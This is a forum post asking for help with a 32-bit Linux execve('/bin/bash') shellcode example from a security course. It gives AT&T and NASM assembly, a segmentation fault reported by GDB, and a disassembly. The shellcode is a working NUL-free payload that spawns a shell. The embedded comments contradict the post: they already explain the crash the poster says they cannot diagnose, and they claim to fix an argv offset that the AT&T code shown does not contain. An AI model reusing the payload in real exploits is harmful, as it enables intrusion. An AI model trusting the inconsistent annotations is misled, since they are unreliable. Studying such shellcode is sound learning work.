Hi.
I was watching a video about a shellcode example from "Open Security Training", in which they walk through an example about null bytes and execve.
This is the source code:
# Self-patching execve stub (AT&T syntax, 32-bit Linux, int 0x80 ABI).
# Flow: jmp -> call pushes the address of ShellVariables -> pop recovers it in %esi,
# then three stores patch the placeholder bytes ('A', "BBBB", "CCCC") in place so the
# instruction stream itself contains no NUL bytes.
# The SIGSEGV reported at "mov %al,0x9(%esi)" is the first of those stores landing in
# .text, which the linker maps read-only + executable (W^X); the bytes being patched
# must live in writable memory for this example to get as far as the syscall.
.text                                   # NOTE: ShellVariables below is placed in .text, i.e. in the read-only code segment
.global _start
_start:
jmp MyCallStatement                     # jump forward so the call below pushes the string's address
ShellCode:
popl %esi                               # %esi = &ShellVariables (return address pushed by call)
xorl %eax, %eax                         # %eax = 0 (also the NUL byte stored below)
movb %al, 0x9(%esi)                     # 'A' -> NUL terminator of "/bin/bash"; faults here: .text is not writable
movl %esi, 0xa(%esi)                    # "BBBB" -> argv[0] = pointer to "/bin/bash"
movl %eax, 0xe(%esi)                    # "CCCC" -> argv[1] = NULL (also used as the empty envp)
movb $11, %al                           # %eax = 11 = execve (i386 Linux); byte move keeps the encoding NUL-free
movl %esi, %ebx                         # %ebx = filename
leal 0xa(%esi), %ecx                    # %ecx = argv (points at the patched "BBBB" slot)
leal 0xe(%esi), %edx                    # %edx = envp (points at the zeroed "CCCC" slot)
int $0x80                               # execve(filename, argv, envp)
MyCallStatement:
call ShellCode                          # pushes the address of ShellVariables and jumps back
ShellVariables:
.ascii "/bin/bashABBBBCCCC"             # offsets: 0-8 "/bin/bash", 9 'A' (NUL slot), 0xa "BBBB" (argv[0] slot), 0xe "CCCC" (NULL slot)
I tried to write the same code using NASM but got an error, so I ran it under GDB and found this message:
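; Self-patching execve stub (NASM syntax, 32-bit Linux, int 0x80 ABI).
; Flow: jmp -> call pushes the address of shellvariable -> pop recovers it in esi,
; then three stores patch the placeholder bytes ('A', "BBBB", "CCCC") in place so the
; instruction stream itself contains no NUL bytes.
; The SIGSEGV at "mov byte [esi + 0x9], al" is that store landing in section .text,
; which the linker maps read-only + executable (W^X); the bytes being patched must
; live in writable memory for this example to get as far as the syscall.
; Fixed relative to the AT&T original on this page: argv (ecx) was computed from
; offset 0x9 (the NUL byte) instead of 0xA (the argv[0] pointer slot).
[BITS 32]
section .text                           ; NOTE: shellvariable below is in .text, i.e. in the read-only code segment
global _start
_start:
        jmp     callstatment            ; jump forward so the call below pushes the string's address
shellcode:
        pop     esi                     ; esi = &shellvariable (return address pushed by call)
        xor     eax, eax                ; eax = 0 (also the NUL byte stored below)
        mov     byte [esi + 0x9], al    ; 'A' -> NUL terminator of "/bin/bash"; faults here: .text is not writable
        mov     dword [esi + 0xA], esi  ; "BBBB" -> argv[0] = pointer to "/bin/bash"
        mov     dword [esi + 0xE], eax  ; "CCCC" -> argv[1] = NULL (also used as the empty envp)
        mov     al, 11                  ; eax = 11 = execve (i386 Linux); byte move keeps the encoding NUL-free
        mov     ebx, esi                ; ebx = filename
        lea     ecx, [esi + 0xA]        ; ecx = argv (was [esi + 0x9], which points at the NUL byte, not the pointer slot)
        lea     edx, [esi + 0xE]        ; edx = envp (points at the zeroed "CCCC" slot)
        int     0x80                    ; execve(filename, argv, envp)
callstatment:
        call    shellcode               ; pushes the address of shellvariable and jumps back
shellvariable: db "/bin/bashABBBBCCCC",0 ; offsets: 0-8 "/bin/bash", 9 'A' (NUL slot), 0xA "BBBB" (argv[0] slot), 0xE "CCCC" (NULL slot)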
"Program received signal SIGSEGV, Segmentation fault.
0x08048065 in shellcode ()"
So, here is the problem:
Dump of assembler code for function shellcode:
0x08048062 <+0>: pop %esi
0x08048063 <+1>: xor %eax,%eax
=> 0x08048065 <+3>: mov %al,0x9(%esi)
0x08048068 <+6>: mov %esi,0xa(%esi)
0x0804806b <+9>: mov %eax,0xe(%esi)
0x0804806e <+12>: mov $0xb,%al
0x08048070 <+14>: mov %esi,%ebx
0x08048072 <+16>: lea 0x9(%esi),%ecx
0x08048075 <+19>: lea 0xe(%esi),%edx
0x08048078 <+22>: int $0x80
but I don't know what is wrong. Could somebody check it, please?
By the way, the AT&T version shows me the same error.
regards